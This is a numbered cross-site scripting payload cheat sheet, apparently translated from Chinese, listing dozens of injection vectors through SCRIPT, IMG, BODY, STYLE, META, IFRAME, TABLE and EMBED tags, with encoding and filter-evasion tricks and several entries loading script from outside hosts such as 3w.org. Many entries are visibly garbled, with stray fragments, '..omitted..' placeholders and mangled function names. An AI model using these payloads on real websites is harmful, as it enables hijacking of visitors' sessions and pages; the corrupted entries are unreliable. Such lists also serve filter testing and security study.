(1) Plain XSS: JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert pop-ups
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using JavaScript commands
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag without semicolons or quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (encoding calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (encoding calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (encoding calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (encoding calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multiline embedded JavaScript injection; an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (requires the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters basically have no effect in China, because there is nowhere they can be used
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters in front
<IMG SRC=\'#\'" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>